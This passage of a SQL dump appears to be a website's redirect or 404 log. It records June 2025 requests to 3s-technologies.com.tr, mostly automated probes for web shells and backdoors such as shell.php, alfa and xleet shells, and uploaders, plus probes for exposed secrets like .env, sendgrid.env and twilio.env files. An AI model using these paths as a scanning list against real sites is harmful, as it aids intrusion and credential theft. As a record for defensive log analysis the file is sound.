08:41:42','0000-00-00 00:00:00',301),(40699,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/admin-author.php',NULL,'','',4,0,'2025-06-12 08:41:45','0000-00-00 00:00:00',301),(40700,'http://3s-technologies.com.tr/tr/wp-includes/assets/wp-access.php',NULL,'','',4,0,'2025-06-12 08:41:46','0000-00-00 00:00:00',301),(40701,'http://3s-technologies.com.tr/tr/images/uploader.php',NULL,'','',6,0,'2025-06-12 08:41:51','0000-00-00 00:00:00',301),(40702,'http://3s-technologies.com.tr/tr/wp-content/themes/zrt.php',NULL,'','',4,0,'2025-06-12 08:41:52','0000-00-00 00:00:00',301),(40703,'http://3s-technologies.com.tr/tr/shell',NULL,'','',4,0,'2025-06-12 08:41:52','0000-00-00 00:00:00',301),(40704,'http://3s-technologies.com.tr/tr/bitrix/admin/htmleditor2/natural.php',NULL,'','',4,0,'2025-06-12 08:41:54','0000-00-00 00:00:00',301),(40705,'http://3s-technologies.com.tr/tr/phx9iqoxnll.php',NULL,'','',4,0,'2025-06-12 08:41:56','0000-00-00 00:00:00',301),(40706,'http://3s-technologies.com.tr/tr/wp-includes/assets/admiin.php',NULL,'','',4,0,'2025-06-12 08:41:57','0000-00-00 00:00:00',301),(40707,'http://3s-technologies.com.tr/tr/wp-content/cache/w.php',NULL,'','',4,0,'2025-06-12 08:42:02','0000-00-00 00:00:00',301),(40708,'http://3s-technologies.com.tr/tr/qc.php',NULL,'','',4,0,'2025-06-12 08:42:04','0000-00-00 00:00:00',301),(40709,'http://3s-technologies.com.tr/tr/wp-includes/id3/x2.php',NULL,'','',4,0,'2025-06-12 08:42:07','0000-00-00 00:00:00',301),(40710,'http://3s-technologies.com.tr/tr/.well-known/ws.php',NULL,'','',7,0,'2025-06-12 08:42:09','0000-00-00 00:00:00',301),(40711,'http://3s-technologies.com.tr/tr/kqqh695r1ly.php',NULL,'','',4,0,'2025-06-12 08:42:13','0000-00-00 00:00:00',301),(40712,'http://3s-technologies.com.tr/tr/wp-content/uploads/2025/04/natural.php',NULL,'','',4,0,'2025-06-12 08:42:16','0000-00-00 00:00:00',301),(40713,'http://3s-technologies.com.tr/tr/uploads/upload.php',NULL,'','',28,0,'2025-06-12 08:42:18','0000-00-00 00:00:00',301),(40714,'http://3s-technologies.com.tr/tr/wp-includes/images/media/index.php',NULL,'','',5,0,'2025-06-12 08:42:19','0000-00-00 00:00:00',301),(40715,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/admiin.php',NULL,'','',4,0,'2025-06-12 08:42:21','0000-00-00 00:00:00',301),(40716,'http://3s-technologies.com.tr/tr/wp-content/themes/tflow/up.php',NULL,'','',7,0,'2025-06-12 08:42:24','0000-00-00 00:00:00',301),(40717,'http://3s-technologies.com.tr/tr/wp-content/cache/index.php/wp-admin/css/colors/blue/wp-login.php',NULL,'','',4,0,'2025-06-12 08:42:24','0000-00-00 00:00:00',301),(40718,'http://3s-technologies.com.tr/tr/images/mm55.php',NULL,'','',4,0,'2025-06-12 08:42:25','0000-00-00 00:00:00',301),(40719,'http://3s-technologies.com.tr/tr/root',NULL,'','',4,0,'2025-06-12 08:42:30','0000-00-00 00:00:00',301),(40720,'http://3s-technologies.com.tr/tr/wp-admin/ftpnmrs2bqw.php',NULL,'','',4,0,'2025-06-12 08:42:33','0000-00-00 00:00:00',301),(40721,'http://3s-technologies.com.tr/tr/rk1w6vmjj8y.php',NULL,'','',4,0,'2025-06-12 08:42:34','0000-00-00 00:00:00',301),(40722,'http://3s-technologies.com.tr/tr/uploads/index.php',NULL,'','',8,0,'2025-06-12 08:42:35','0000-00-00 00:00:00',301),(40723,'http://3s-technologies.com.tr/tr/data/.backup.php',NULL,'','',4,0,'2025-06-12 08:42:37','0000-00-00 00:00:00',301),(40724,'http://3s-technologies.com.tr/tr/xmlrpc.php0',NULL,'','',11,0,'2025-06-12 08:42:39','0000-00-00 00:00:00',301),(40725,'http://3s-technologies.com.tr/tr/wp-admin/alfacgiapi/perl.alfa.php',NULL,'','',7,0,'2025-06-12 08:42:40','0000-00-00 00:00:00',301),(40726,'http://3s-technologies.com.tr/tr/wp-includes/requests/exception/xbrain.php',NULL,'','',4,0,'2025-06-12 08:42:41','0000-00-00 00:00:00',301),(40727,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/llj.php',NULL,'','',4,0,'2025-06-12 08:42:42','0000-00-00 00:00:00',301),(40728,'http://3s-technologies.com.tr/tr/wp-content/plugins/seox',NULL,'','',4,0,'2025-06-12 08:42:43','0000-00-00 00:00:00',301),(40729,'http://3s-technologies.com.tr/tr/fex.php',NULL,'','',9,0,'2025-06-12 08:42:47','0000-00-00 00:00:00',301),(40730,'http://3s-technologies.com.tr/tr/wp-includes/phpmailer/2222.php',NULL,'','',4,0,'2025-06-12 08:42:51','0000-00-00 00:00:00',301),(40731,'http://3s-technologies.com.tr/tr/css.php/cloud.php',NULL,'','',4,0,'2025-06-12 08:42:51','0000-00-00 00:00:00',301),(40732,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/endpoints/admiin.php',NULL,'','',4,0,'2025-06-12 08:42:53','0000-00-00 00:00:00',301),(40733,'http://3s-technologies.com.tr/tr/wp-includes/block-supports/dimensions-ajax.php',NULL,'','',4,0,'2025-06-12 08:42:56','0000-00-00 00:00:00',301),(40734,'http://3s-technologies.com.tr/tr/wp-includes/pomo/wp_class_datalib.php',NULL,'','',7,0,'2025-06-12 08:42:57','0000-00-00 00:00:00',301),(40735,'http://3s-technologies.com.tr/tr/xxc.php',NULL,'','',13,0,'2025-06-12 08:42:59','0000-00-00 00:00:00',301),(40736,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/content/makeasmtp.php',NULL,'','',4,0,'2025-06-12 08:43:00','0000-00-00 00:00:00',301),(40737,'http://3s-technologies.com.tr/tr/wp-includes/style-engine/wp-conflg.php',NULL,'','',30,0,'2025-06-12 08:43:01','0000-00-00 00:00:00',301),(40738,'http://3s-technologies.com.tr/tr/nope.php',NULL,'','',26,0,'2025-06-12 08:43:01','0000-00-00 00:00:00',301),(40739,'http://3s-technologies.com.tr/tr/index/function.phphttps:/trezurekart.com/classwithtostring.php',NULL,'','',4,0,'2025-06-12 08:43:05','0000-00-00 00:00:00',301),(40740,'http://3s-technologies.com.tr/tr/images/xbrain.php',NULL,'','',4,0,'2025-06-12 08:43:07','0000-00-00 00:00:00',301),(40741,'http://3s-technologies.com.tr/tr/wp-content/plugins/apikey/natural.php',NULL,'','',4,0,'2025-06-12 08:43:08','0000-00-00 00:00:00',301),(40742,'http://3s-technologies.com.tr/tr/wp-content/plugins/b.php',NULL,'','',4,0,'2025-06-12 08:43:09','0000-00-00 00:00:00',301),(40743,'http://3s-technologies.com.tr/tr/wp-includes/customize/mariju.php',NULL,'','',4,0,'2025-06-12 08:43:09','0000-00-00 00:00:00',301),(40744,'http://3s-technologies.com.tr/tr/class-wp-lock.php',NULL,'','',4,0,'2025-06-12 08:43:10','0000-00-00 00:00:00',301),(40745,'http://3s-technologies.com.tr/tr/wp-content/alfacgiapi/perl.alfa.php',NULL,'','',7,0,'2025-06-12 08:43:14','0000-00-00 00:00:00',301),(40746,'http://3s-technologies.com.tr/tr/comment.php',NULL,'','',5,0,'2025-06-12 08:43:16','0000-00-00 00:00:00',301),(40747,'http://3s-technologies.com.tr/tr/wp-content/x/wp-post.php',NULL,'','',4,0,'2025-06-12 08:43:16','0000-00-00 00:00:00',301),(40748,'http://3s-technologies.com.tr/tr/wp-content/themes/config.bak.php',NULL,'','',7,0,'2025-06-12 08:43:20','0000-00-00 00:00:00',301),(40749,'http://3s-technologies.com.tr/tr/wp-includes/id3/admiin.php',NULL,'','',4,0,'2025-06-12 08:43:22','0000-00-00 00:00:00',301),(40750,'http://3s-technologies.com.tr/tr/wp-content/alfa_data/alfacgiapi/perl.alfa.php',NULL,'','',7,0,'2025-06-12 08:43:23','0000-00-00 00:00:00',301),(40751,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/wp-protector.php',NULL,'','',4,0,'2025-06-12 08:43:29','0000-00-00 00:00:00',301),(40752,'http://3s-technologies.com.tr/tr/wp-content/x/wp-includes/text/diff/engine/shell.php',NULL,'','',4,0,'2025-06-12 08:43:30','0000-00-00 00:00:00',301),(40753,'http://3s-technologies.com.tr/tr/images/alfa_data/alfacgiapi/perl.alfa.php',NULL,'','',7,0,'2025-06-12 08:43:31','0000-00-00 00:00:00',301),(40754,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/my1.php',NULL,'','',4,0,'2025-06-12 08:43:31','0000-00-00 00:00:00',301),(40755,'http://3s-technologies.com.tr/tr/upload/upload.php',NULL,'','',7,0,'2025-06-12 08:43:35','0000-00-00 00:00:00',301),(40756,'http://3s-technologies.com.tr/tr/assets/vendor/bootstrap/css',NULL,'','',4,0,'2025-06-12 08:43:40','0000-00-00 00:00:00',301),(40757,'http://3s-technologies.com.tr/tr/wp-admin/network/xbrain.php',NULL,'','',4,0,'2025-06-12 08:43:42','0000-00-00 00:00:00',301),(40758,'http://3s-technologies.com.tr/tr/wp-includes/text/chosen.php',NULL,'','',10,0,'2025-06-12 08:43:42','0000-00-00 00:00:00',301),(40759,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/x2.php',NULL,'','',4,0,'2025-06-12 08:43:44','0000-00-00 00:00:00',301),(40760,'http://3s-technologies.com.tr/tr/wp-post-editor.php',NULL,'','',7,0,'2025-06-12 08:43:45','0000-00-00 00:00:00',301),(40761,'http://3s-technologies.com.tr/tr/wp-admin/images/mlm.php',NULL,'','',4,0,'2025-06-12 08:43:51','0000-00-00 00:00:00',301),(40762,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/plugins/charmap',NULL,'','',4,0,'2025-06-12 08:43:58','0000-00-00 00:00:00',301),(40763,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/namespaced',NULL,'','',27,0,'2025-06-12 08:44:04','0000-00-00 00:00:00',301),(40764,'http://3s-technologies.com.tr/tr/images/xmrlpc.php',NULL,'','',33,0,'2025-06-12 08:44:05','0000-00-00 00:00:00',301),(40765,'http://3s-technologies.com.tr/tr/wp-includes/wp-class.php/wp-content/uploads/wplivechat',NULL,'','',4,0,'2025-06-12 08:44:07','0000-00-00 00:00:00',301),(40766,'http://3s-technologies.com.tr/tr/wp-includes/bw78qubsii6.php',NULL,'','',4,0,'2025-06-12 08:44:14','0000-00-00 00:00:00',301),(40767,'http://3s-technologies.com.tr/tr/wp-admin/network/natural.php',NULL,'','',4,0,'2025-06-12 08:44:14','0000-00-00 00:00:00',301),(40768,'http://3s-technologies.com.tr/tr/wp-includes/ie9fssvmdeo.php',NULL,'','',4,0,'2025-06-12 08:44:18','0000-00-00 00:00:00',301),(40769,'http://3s-technologies.com.tr/tr/wp-includes/wp-red.php',NULL,'','',7,0,'2025-06-12 08:44:20','0000-00-00 00:00:00',301),(40770,'http://3s-technologies.com.tr/tr/wp-content/auto.php',NULL,'','',4,0,'2025-06-12 08:44:21','0000-00-00 00:00:00',301),(40771,'http://3s-technologies.com.tr/tr/wp-includes/x2.php',NULL,'','',4,0,'2025-06-12 08:44:22','0000-00-00 00:00:00',301),(40772,'http://3s-technologies.com.tr/tr/nz7aol3hjic.php',NULL,'','',4,0,'2025-06-12 08:44:27','0000-00-00 00:00:00',301),(40773,'http://3s-technologies.com.tr/tr/wp-includes/blocks/loginout',NULL,'','',5,0,'2025-06-12 08:44:29','0000-00-00 00:00:00',301),(40774,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/edit.php',NULL,'','',4,0,'2025-06-12 08:44:31','0000-00-00 00:00:00',301),(40775,'http://3s-technologies.com.tr/tr/wp-content/uploads/2019/mini.php',NULL,'','',4,0,'2025-06-12 08:44:32','0000-00-00 00:00:00',301),(40776,'http://3s-technologies.com.tr/tr/wp-admin/ilnqjhgupag.php',NULL,'','',4,0,'2025-06-12 08:44:34','0000-00-00 00:00:00',301),(40777,'http://3s-technologies.com.tr/tr/templates/ theme /index.php',NULL,'','',7,0,'2025-06-12 08:44:42','0000-00-00 00:00:00',301),(40778,'http://3s-technologies.com.tr/tr/wp-includes/block-supports/admiin.php',NULL,'','',4,0,'2025-06-12 08:44:46','0000-00-00 00:00:00',301),(40779,'http://3s-technologies.com.tr/tr/wp-content/plugins/upspy/con.php',NULL,'','',7,0,'2025-06-12 08:44:47','0000-00-00 00:00:00',301),(40780,'http://3s-technologies.com.tr/tr/wp-content/themes/inpust.php',NULL,'','',4,0,'2025-06-12 08:44:47','0000-00-00 00:00:00',301),(40781,'http://3s-technologies.com.tr/tr/wp-includes/blocks/post-author',NULL,'','',6,0,'2025-06-12 08:44:49','0000-00-00 00:00:00',301),(40782,'http://3s-technologies.com.tr/tr/wp-includes/blocks/post-author/wp-post.php',NULL,'','',4,0,'2025-06-12 08:44:51','0000-00-00 00:00:00',301),(40783,'http://3s-technologies.com.tr/tr/assets/images/scan.php',NULL,'','',4,0,'2025-06-12 08:44:52','0000-00-00 00:00:00',301),(40784,'http://3s-technologies.com.tr/tr/wp-content/themes/classic/inc/admiin.php',NULL,'','',4,0,'2025-06-12 08:44:53','0000-00-00 00:00:00',301),(40785,'http://3s-technologies.com.tr/tr/wp-content/gallery',NULL,'','',4,0,'2025-06-12 08:44:53','0000-00-00 00:00:00',301),(40786,'http://3s-technologies.com.tr/tr/system/default.php',NULL,'','',4,0,'2025-06-12 08:45:00','0000-00-00 00:00:00',301),(40787,'http://3s-technologies.com.tr/tr/wp-admin/network/admiin.php',NULL,'','',4,0,'2025-06-12 08:45:01','0000-00-00 00:00:00',301),(40788,'http://3s-technologies.com.tr/tr/libraries/joomla/jmails.php',NULL,'','',13,0,'2025-06-12 08:45:05','0000-00-00 00:00:00',301),(40789,'https://3s-technologies.com.tr/en/components/com_virtuemart/assets/js/fancybox/\' d.href \'',NULL,'','',3,0,'2025-06-13 08:43:31','0000-00-00 00:00:00',301),(40790,'https://3s-technologies.com.tr/en/components/com_virtuemart/assets/js/fancybox/\' c \'',NULL,'','',3,0,'2025-06-13 08:43:42','0000-00-00 00:00:00',301),(40791,'https://3s-technologies.com.tr/en/components/com_virtuemart/assets/js/fancybox/\' (/^https/i.test(window.location.href||',NULL,'','',3,0,'2025-06-13 08:43:46','0000-00-00 00:00:00',301),(40792,'http://3s-technologies.com.tr/tr/wp-admin/user/plugins.php',NULL,'','',7,0,'2025-06-14 06:59:42','0000-00-00 00:00:00',301),(40793,'http://3s-technologies.com.tr/tr/wp-includes/customize/plugins.php',NULL,'','',5,0,'2025-06-14 06:59:43','0000-00-00 00:00:00',301),(40794,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/plugins.php',NULL,'','',4,0,'2025-06-14 06:59:45','0000-00-00 00:00:00',301),(40795,'http://3s-technologies.com.tr/tr/wp-content/themes/plugins.php',NULL,'','',5,0,'2025-06-14 06:59:45','0000-00-00 00:00:00',301),(40796,'http://3s-technologies.com.tr/tr/wp-includes/id3/plugins.php',NULL,'','',4,0,'2025-06-14 06:59:46','0000-00-00 00:00:00',301),(40797,'http://3s-technologies.com.tr/tr/wp-admin/css/plugins.php',NULL,'','',5,0,'2025-06-14 06:59:47','0000-00-00 00:00:00',301),(40798,'http://3s-technologies.com.tr/tr/wp-admin/includes/plugins.php',NULL,'','',8,0,'2025-06-14 06:59:47','0000-00-00 00:00:00',301),(40799,'http://3s-technologies.com.tr/tr/wp-admin/maint/plugins.php',NULL,'','',4,0,'2025-06-14 06:59:49','0000-00-00 00:00:00',301),(40800,'http://3s-technologies.com.tr/tr/wp-content/upgrade/plugins.php',NULL,'','',5,0,'2025-06-14 06:59:50','0000-00-00 00:00:00',301),(40801,'http://3s-technologies.com.tr/tr/images/plugins.php',NULL,'','',10,0,'2025-06-14 06:59:51','0000-00-00 00:00:00',301),(40802,'http://3s-technologies.com.tr/tr/css/plugins.php',NULL,'','',9,0,'2025-06-14 06:59:51','0000-00-00 00:00:00',301),(40803,'http://3s-technologies.com.tr/tr/.tmb/plugins.php',NULL,'','',4,0,'2025-06-14 06:59:53','0000-00-00 00:00:00',301),(40804,'http://3s-technologies.com.tr/tr/wp-includes/ixr/plugins.php',NULL,'','',5,0,'2025-06-14 06:59:54','0000-00-00 00:00:00',301),(40805,'http://3s-technologies.com.tr/tr/cgi-bin/plugins.php',NULL,'','',3,0,'2025-06-14 06:59:54','0000-00-00 00:00:00',301),(40806,'http://3s-technologies.com.tr/tr/wp-includes/random_compat/plugins.php',NULL,'','',4,0,'2025-06-14 06:59:55','0000-00-00 00:00:00',301),(40807,'http://3s-technologies.com.tr/tr/wp-content/languages/plugins.php',NULL,'','',5,0,'2025-06-14 06:59:56','0000-00-00 00:00:00',301),(40808,'http://3s-technologies.com.tr/tr/wp-content/plugins/init-help/init.php',NULL,'','',21,0,'2025-06-15 08:37:53','0000-00-00 00:00:00',301),(40809,'http://3s-technologies.com.tr/tr/wp-includes/js/dist/development',NULL,'','',28,0,'2025-06-15 08:38:29','0000-00-00 00:00:00',301),(40810,'http://3s-technologies.com.tr/tr/wp-includes/js/imgareaselect',NULL,'','',25,0,'2025-06-15 08:38:30','0000-00-00 00:00:00',301),(40811,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/langs',NULL,'','',25,0,'2025-06-15 08:38:31','0000-00-00 00:00:00',301),(40812,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/plugins/compat3x',NULL,'','',21,0,'2025-06-15 08:38:32','0000-00-00 00:00:00',301),(40813,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/skins/lightgray',NULL,'','',22,0,'2025-06-15 08:38:32','0000-00-00 00:00:00',301),(40814,'http://3s-technologies.com.tr/tr/wp-includes/js/jquery',NULL,'','',69,0,'2025-06-15 08:38:33','0000-00-00 00:00:00',301),(40815,'http://3s-technologies.com.tr/tr/wp-includes/js/mediaelement',NULL,'','',23,0,'2025-06-15 08:38:34','0000-00-00 00:00:00',301),(40816,'http://3s-technologies.com.tr/tr/wp-includes/js/mediaelement/renderers',NULL,'','',21,0,'2025-06-15 08:38:35','0000-00-00 00:00:00',301),(40817,'http://3s-technologies.com.tr/tr/wp-includes/js/plupload',NULL,'','',22,0,'2025-06-15 08:38:35','0000-00-00 00:00:00',301),(40818,'http://3s-technologies.com.tr/tr/wp-includes/js/swfupload',NULL,'','',24,0,'2025-06-15 08:38:36','0000-00-00 00:00:00',301),(40819,'http://3s-technologies.com.tr/tr/wp-includes/js/thickbox',NULL,'','',22,0,'2025-06-15 08:38:37','0000-00-00 00:00:00',301),(40820,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/namespaced/core',NULL,'','',23,0,'2025-06-15 08:38:38','0000-00-00 00:00:00',301),(40821,'http://3s-technologies.com.tr/tr/wp-includes/theme-compat/theme-compat',NULL,'','',20,0,'2025-06-15 08:38:39','0000-00-00 00:00:00',301),(40822,'http://3s-technologies.com.tr/tr/wp-includes/requests/src',NULL,'','',21,0,'2025-06-15 08:38:41','0000-00-00 00:00:00',301),(40823,'https://3s-technologies.com.tr/tr/?option=com_chronocontact',NULL,'','',1,0,'2025-06-16 06:29:43','0000-00-00 00:00:00',301),(40824,'http://www.3s-technologies.com.tr/tr/timthumb.php',NULL,'','',1,0,'2025-06-17 04:21:06','0000-00-00 00:00:00',301),(40825,'http://www.3s-technologies.com.tr/tr/admin/timthumb.php',NULL,'','',1,0,'2025-06-17 04:21:08','0000-00-00 00:00:00',301),(40826,'http://www.3s-technologies.com.tr/tr/thumb.php',NULL,'','',1,0,'2025-06-17 04:21:10','0000-00-00 00:00:00',301),(40827,'http://www.3s-technologies.com.tr/tr/admin/thumb.php',NULL,'','',1,0,'2025-06-17 04:21:12','0000-00-00 00:00:00',301),(40828,'http://3s-technologies.com.tr/tr/admin/plugins/fileupload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',2,0,'2025-06-17 07:29:11','0000-00-00 00:00:00',301),(40829,'http://3s-technologies.com.tr/tr/xleetshell.php',NULL,'','',2,0,'2025-06-17 09:34:55','0000-00-00 00:00:00',301),(40830,'http://3s-technologies.com.tr/tr/env.php',NULL,'http://3s-technologies.com.tr/env.php','',16,0,'2025-06-18 13:07:40','0000-00-00 00:00:00',301),(40831,'https://3s-technologies.com.tr/tr/account',NULL,'https://3s-technologies.com.tr/account','',2,0,'2025-06-18 14:14:30','0000-00-00 00:00:00',301),(40832,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/post.php',NULL,'','',1,0,'2025-06-20 18:07:24','0000-00-00 00:00:00',301),(40833,'http://3s-technologies.com.tr/tr/images/2008.php',NULL,'','',1,0,'2025-06-20 18:07:43','0000-00-00 00:00:00',301),(40834,'http://3s-technologies.com.tr/tr/images/g3.php',NULL,'','',9,0,'2025-06-20 18:07:45','0000-00-00 00:00:00',301),(40835,'http://3s-technologies.com.tr/tr/img/omar.php.png',NULL,'','',1,0,'2025-06-20 18:07:45','0000-00-00 00:00:00',301),(40836,'http://3s-technologies.com.tr/tr/ms-edit.php',NULL,'','',188,0,'2025-06-20 18:07:51','0000-00-00 00:00:00',301),(40837,'http://3s-technologies.com.tr/tr/tmp/.phpesretb_zablokowane',NULL,'','',1,0,'2025-06-20 18:07:54','0000-00-00 00:00:00',301),(40838,'http://3s-technologies.com.tr/tr/upload/upload_cert.php',NULL,'','',1,0,'2025-06-20 18:07:55','0000-00-00 00:00:00',301),(40839,'http://3s-technologies.com.tr/tr/uploads/683584ibal.php',NULL,'','',1,0,'2025-06-20 18:07:56','0000-00-00 00:00:00',301),(40840,'http://3s-technologies.com.tr/tr/uploads/angulu.php',NULL,'','',1,0,'2025-06-20 18:07:56','0000-00-00 00:00:00',301),(40841,'http://3s-technologies.com.tr/tr/uploads/phuploader.php',NULL,'','',19,0,'2025-06-20 18:07:57','0000-00-00 00:00:00',301),(40842,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/xmrlpc.php',NULL,'','',30,0,'2025-06-20 18:07:58','0000-00-00 00:00:00',301),(40843,'http://3s-technologies.com.tr/tr/wp-admin/includes/admin-header.php',NULL,'','',1,0,'2025-06-20 18:08:01','0000-00-00 00:00:00',301),(40844,'http://3s-technologies.com.tr/tr/wp-admin/includes/logs.php',NULL,'','',1,0,'2025-06-20 18:08:01','0000-00-00 00:00:00',301),(40845,'http://3s-technologies.com.tr/tr/wp-admin/includes/media.php',NULL,'','',1,0,'2025-06-20 18:08:01','0000-00-00 00:00:00',301),(40846,'http://3s-technologies.com.tr/tr/wp-content/layout.php',NULL,'','',1,0,'2025-06-20 18:08:07','0000-00-00 00:00:00',301),(40847,'http://3s-technologies.com.tr/tr/wp-content/themes/wp-pridmag/layout.php',NULL,'','',1,0,'2025-06-20 18:08:14','0000-00-00 00:00:00',301),(40848,'http://3s-technologies.com.tr/tr/wp-content/uploads/414.php',NULL,'','',1,0,'2025-06-20 18:08:14','0000-00-00 00:00:00',301),(40849,'http://3s-technologies.com.tr/tr/wp-content/uploads/gbaun.php',NULL,'','',1,0,'2025-06-20 18:08:15','0000-00-00 00:00:00',301),(40850,'http://3s-technologies.com.tr/tr/wp-content/uploads/themes.php',NULL,'','',2,0,'2025-06-20 18:08:16','0000-00-00 00:00:00',301),(40851,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/cy5ipc.php',NULL,'','',1,0,'2025-06-20 18:08:20','0000-00-00 00:00:00',301),(40852,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-taxonomy.editor.php',NULL,'','',1,0,'2025-06-20 18:08:23','0000-00-00 00:00:00',301),(40853,'http://3s-technologies.com.tr/tr/wp-includes/pomo/user-new.php',NULL,'','',1,0,'2025-06-20 18:08:27','0000-00-00 00:00:00',301),(40854,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/src/about.php',NULL,'','',1,0,'2025-06-20 18:08:27','0000-00-00 00:00:00',301),(40855,'http://3s-technologies.com.tr/tr/wp-includes/wp-widgets.php',NULL,'','',3,0,'2025-06-20 18:08:30','0000-00-00 00:00:00',301),(40856,'http://3s-technologies.com.tr/tr/yindu.php',NULL,'','',8,0,'2025-06-20 18:08:33','0000-00-00 00:00:00',301),(40857,'http://3s-technologies.com.tr/tr/libraries/phpmailer/index.php',NULL,'','',2,0,'2025-06-20 18:08:35','0000-00-00 00:00:00',301),(40858,'http://3s-technologies.com.tr/tr/wp-content/uploads/bbumy/flower.php',NULL,'','',2,0,'2025-06-20 18:08:39','0000-00-00 00:00:00',301),(40859,'http://3s-technologies.com.tr/tr/wp-includes/css/xc.php',NULL,'','',2,0,'2025-06-20 18:08:41','0000-00-00 00:00:00',301),(40860,'http://3s-technologies.com.tr/tr/wp/index.php',NULL,'','',2,0,'2025-06-20 18:08:43','0000-00-00 00:00:00',301),(40861,'http://3s-technologies.com.tr/tr/functions.php',NULL,'','',26,0,'2025-06-20 18:08:45','0000-00-00 00:00:00',301),(40862,'http://3s-technologies.com.tr/tr/cookie.php',NULL,'','',14,0,'2025-06-20 18:08:47','0000-00-00 00:00:00',301),(40863,'http://3s-technologies.com.tr/tr/spip.php',NULL,'','',18,0,'2025-06-20 18:08:48','0000-00-00 00:00:00',301),(40864,'http://3s-technologies.com.tr/tr/disagreed.php',NULL,'','',10,0,'2025-06-20 18:08:50','0000-00-00 00:00:00',301),(40865,'http://3s-technologies.com.tr/tr/feeds.php',NULL,'','',8,0,'2025-06-20 18:08:51','0000-00-00 00:00:00',301),(40866,'http://3s-technologies.com.tr/tr/colors.php',NULL,'','',12,0,'2025-06-20 18:08:55','0000-00-00 00:00:00',301),(40867,'http://3s-technologies.com.tr/tr/alfa-rex1.php',NULL,'','',10,0,'2025-06-20 18:08:56','0000-00-00 00:00:00',301),(40868,'http://3s-technologies.com.tr/tr/wxo.php',NULL,'','',22,0,'2025-06-20 18:09:00','0000-00-00 00:00:00',301),(40869,'http://3s-technologies.com.tr/tr/colour.php',NULL,'','',7,0,'2025-06-20 18:09:01','0000-00-00 00:00:00',301),(40870,'http://3s-technologies.com.tr/tr/wp-contentt.php',NULL,'','',8,0,'2025-06-20 18:09:02','0000-00-00 00:00:00',301),(40871,'http://3s-technologies.com.tr/tr/block-bindings.php',NULL,'','',8,0,'2025-06-20 18:09:04','0000-00-00 00:00:00',301),(40872,'http://3s-technologies.com.tr/tr/wp-2019.php/chosen.php',NULL,'','',7,0,'2025-06-21 16:21:48','0000-00-00 00:00:00',301),(40873,'https://3s-technologies.com.tr/en/newfile.php',NULL,'www.google.com','',1,0,'2025-06-21 20:28:39','0000-00-00 00:00:00',301),(40874,'http://3s-technologies.com.tr/en/wp-content/plugins/view-more/ioxi.php',NULL,'www.google.com','',5,0,'2025-06-21 20:28:40','0000-00-00 00:00:00',301),(40875,'https://3s-technologies.com.tr/en/wp-content/plugins/erinyani/baxa1.php7',NULL,'www.google.com','',1,0,'2025-06-21 20:28:41','0000-00-00 00:00:00',301),(40876,'https://3s-technologies.com.tr/en/baxa1.php7',NULL,'www.google.com','',1,0,'2025-06-21 20:28:42','0000-00-00 00:00:00',301),(40877,'http://3s-technologies.com.tr/en/wp-content/plugins/erinyani/baxa1.php',NULL,'www.google.com','',4,0,'2025-06-21 20:28:43','0000-00-00 00:00:00',301),(40878,'https://3s-technologies.com.tr/en/baxa1.php',NULL,'www.google.com','',1,0,'2025-06-21 20:28:44','0000-00-00 00:00:00',301),(40879,'https://3s-technologies.com.tr/en/wp-content/plugins/seoxx/randkeyword.php',NULL,'www.google.com','',1,0,'2025-06-21 20:28:45','0000-00-00 00:00:00',301),(40880,'https://www.3s-technologies.com.tr/tr/sendgrid.env',NULL,'','',5,0,'2025-06-22 09:16:26','0000-00-00 00:00:00',301),(40881,'https://3s-technologies.com.tr/tr/sendgrid.env',NULL,'','',5,0,'2025-06-22 09:16:26','0000-00-00 00:00:00',301),(40882,'https://www.3s-technologies.com.tr/tr/twilio.env',NULL,'','',4,0,'2025-06-22 09:16:28','0000-00-00 00:00:00',301),(40883,'https://3s-technologies.com.tr/tr/twilio.env',NULL,'','',3,0,'2025-06-22 09:16:28','0000-00-00 00:00:00',301),(40884,'https://www.3s-technologies.com.tr/tr/dev/.env',NULL,'','',5,0,'2025-06-22 09:16:33','0000-00-00 00:00:00',301),(40885,'https://www.3s-technologies.com.tr/tr/app_dev.php/_profiler/phpinfo',NULL,'','',5,0,'2025-06-22 09:16:35','0000-00-00 00:00:00',301),(40886,'https://www.3s-technologies.com.tr/tr/admin/.env',NULL,'','',9,0,'2025-06-22 09:16:37','0000-00-00 00:00:00',301),(40887,'http://3s-technologies.com.tr/tr/wp-admin/maint/atomlib.php',NULL,'','',7,0,'2025-06-22 13:59:04','0000-00-00 00:00:00',301),(40888,'http://3s-technologies.com.tr/tr/wp-includes/widgets/hehe.php',NULL,'','',17,0,'2025-06-22 22:38:31','0000-00-00 00:00:00',301),(40889,'http://3s-technologies.com.tr/tr/wp-content/plugins/item.php',NULL,'','',5,0,'2025-06-22 22:38:35','0000-00-00 00:00:00',301),(40890,'http://3s-technologies.com.tr/tr/wp-admin/images/edit-tags.php',NULL,'','',18,0,'2025-06-22 22:38:52','0000-00-00 00:00:00',301),(40891,'http://3s-technologies.com.tr/tr/themes/twentytwentytwo/index.php',NULL,'','',57,0,'2025-06-22 22:38:56','0000-00-00 00:00:00',301),(40892,'http://3s-technologies.com.tr/tr/2025/wp-login.php',NULL,'http://3s-technologies.com.tr/2025/wp-login.php','',1,0,'2025-06-23 17:19:46','0000-00-00 00:00:00',301),(40893,'http://3s-technologies.com.tr/tr/wp-includes/pomo/mpvloi.php',NULL,'','',15,0,'2025-06-23 18:43:57','0000-00-00 